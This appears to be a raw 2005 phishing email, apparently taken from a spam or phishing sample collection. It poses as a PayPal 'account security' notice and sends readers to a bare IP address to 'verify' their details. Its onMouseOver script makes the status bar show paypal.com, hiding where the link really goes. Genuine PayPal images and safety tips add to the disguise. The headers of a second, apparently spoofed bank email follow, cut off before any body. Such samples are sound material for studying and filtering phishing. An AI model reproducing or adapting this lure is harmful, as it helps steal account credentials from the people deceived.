From: "PayPal" <service@paypal.com>
To: <username@domain.com>
Subject: PayPal Account Security Measures
Date: Sun, 06 Feb 05 17:50:44 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="FBE23.05_8C95ECFE6"
X-Priority: 3
X-MSMail-Priority: Normal
Status: O
X-Status: 
X-Keywords:                  
X-UID: 107

This is a multi-part message in MIME format.

--FBE23.05_8C95ECFE6
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

</style>
</head>

<BODY><TABLE><TR><TD bgcolor=3D"#ffffff">
<table width=3D"600" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" alig=
n=3D"center">
<tr valign=3D"top">
	<td><a href=3D"https://www.paypal.com/us" target=3D"_blank" ><img src=3D"=
http://images.paypal.com/en_US/i/logo/email_logo.gif" alt=3D"PayPal" borde=
r=3D"0"></a></td>
</tr>
</table>

<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0">
<tr>
	<td background=3D"http://images.paypal.com/images/bg_clk.gif" width=3D"10=
0%"><img src=3D"http://images.paypal.com/images/pixel.gif" height=3D"29" w=
idth=3D"1" border=3D"0"></td>
</tr>
<tr>
	<td><img src=3D"http://images.paypal.com/images/pixel.gif" height=3D"10" =
width=3D"1" border=3D"0"></td>
</tr>
</table>

<table width=3D"600" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" alig=
n=3D"center">
<tr valign=3D"top">
	<td width=3D"400">
	<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"5" border=3D"0">
		<tr>
			<td>Dear PayPal Member,<br><br>
Your account has been randomly flagged in our system as a part of our rout=
ine security measures. 
This is a must to ensure that only you have access and use of your PayPal =
account and to ensure a safe PayPal experience. We require all flagged acc=
ounts to verify their information on file with us. To verify your Informat=
ion at this time, please visit our secure server webform by clicking the h=
yperlink below
<br><br>
 
<table width=3D"75%" cellpadding=3D"1" cellspacing=3D"0" border=3D"0" bgco=
lor=3D"#FFE65C" align=3D"left">
<tr>
<td>
	<table width=3D"100%" cellpadding=3D"4" cellspacing=3D"0" border=3D"0" bg=
color=3D"#FFFECD" align=3D"center">
		<tr>
			<td class=3D"pp_sansserif" align=3D"center"><a href=3D"http://220.65.28=
3/webscr/" 
    onMouseOver=3D"window.status=3D'https://www.paypal.com';return true;" =

    onMouseOut=3D"window.status=3D' '; return true;">Click here to verify =
your Information</a>

</td>
		</tr>
	</table>
</td>
</tr>
</table>

<br>
<br>
<br>
 Thank you for using PayPal!<br>
The PayPal Team</td>
</tr>

<tr>
<td>
<hr class=3D"dotted">
</td>
</tr>

<tr>
<td>
<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0">
<tr>
<td class=3D"pp_footer">Please do not reply to this e-mail. Mail sent
to this address cannot be answered. For assistance, log
in</a> to your PayPal account and choose the "Help" link in the
footer of any page.<br>
<br class=3D"h10">
 To receive email notifications in plain text instead of HTML,
update your preferences <a href=3D"https://www.paypal.com/us/PREFS-NOTI" t=
arget=3D"_blank" > here</a>.</td>
</tr>

<tr>
	<td><img src=3D"http://images.paypal.com/en_US/i/scr/pixel.gif" height=3D=
"10" width=3D"1" border=3D"0"></td>
</tr>
</table>
</td>
</tr>

<tr>
	<td><br><span class=3D"pp_footer">PayPal Email ID PP478<br><br></span></t=
d>
</tr>
</table>
</td>
<td><img src=3D"http://images.paypal.com/en_US/i/scr/pixel.gif" height=3D"=
1" width=3D"10" border=3D"0"></td>
<td width=3D"190" valign=3D"top">
<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"1" border=3D"0" bgc=
olor=3D"#CCCCCC">
<tr>
	<td>
	<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0" bg=
color=3D"#ffffff">
	<tr>
	<td>
		<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"5" border=3D"0" b=
gcolor=3D"#EEEEEE">
		<tr>
		<td class=3D"pp_sidebartextbold" align=3D"center">Protect Your Account I=
nfo</td>
		</tr>
		</table>
		
<table width=3D"100%" cellspacing=3D"0" cellpadding=3D"5" border=3D"0">
<tr>
<td class=3D"pp_sidebartext">Make sure you never provide your
password to fraudulent websites.<br>
<br>
To safely and securely access the PayPal website or your account,
open up a new web browser (e.g. Internet Explorer or Netscape) and
type in the PayPal URL (http://www.paypal.com/).<br>
<br>
PayPal will never ask you to enter your password in an email.<br>
<br>
 For more information on protecting yourself from fraud, please
review our Security Tips at http://www.paypal.com/securitytips<br>
<img src=3D"http://images.paypal.com/en_US/images/pixel.gif" height=3D
"5" width=3D"1" border=3D"0"></td>
</tr>
</table>
</td>
</tr>

--FBE23.05_8C95ECFE6--

From customer@regions.com  Sun Feb  6 21:09:38 2005
Return-Path: <customer@regions.com>
X-Original-To: username@login.domain.com
Delivered-To: username@login.domain.com
Received: from mail1.domain.com (mail1.domain.com [10.23.1.4])
	by spanky.domain.com (Postfix) with ESMTP id 506B7536ED3
	for <username@login.domain.com>; Sun,  6 Feb 2005 21:09:38 -0500 (EST)
Received: from S0106000ea60ab3b4.vn.shawcable.net (S0106000ea60ab3b4.vn.shawcable.net [24.80.71.123])
	by mail1.domain.com (Postfix) with SMTP id BDDE785A954
	for <username@domain.com>; Sun,  6 Feb 2005 21:02:20 -0500 (EST)
X-Message-Info: O/ko+333+gpw/GAQ+97/9671902889618
Received: from smtp-csnet.ah.customer@regions.com ([24.80.71.123]) by cn02-l51.customer@regions.com with Microsoft SMTPSVC(5.0.1922.0260);
	 Mon, 07 Feb 2005 05:59:21 +0200
X-Message-Info: DDNX+%ND_LC_CHAR[1-3]076+kkz+QU+8/42836384659742
Received: (qmail 94771 invoked by uid 90); Mon, 07 Feb 2005 07:55:21 +0400
Date: Mon, 07 Feb 2005 04:55:21 +0100
Message-Id: <718365874375.77571@customer@regions.com>
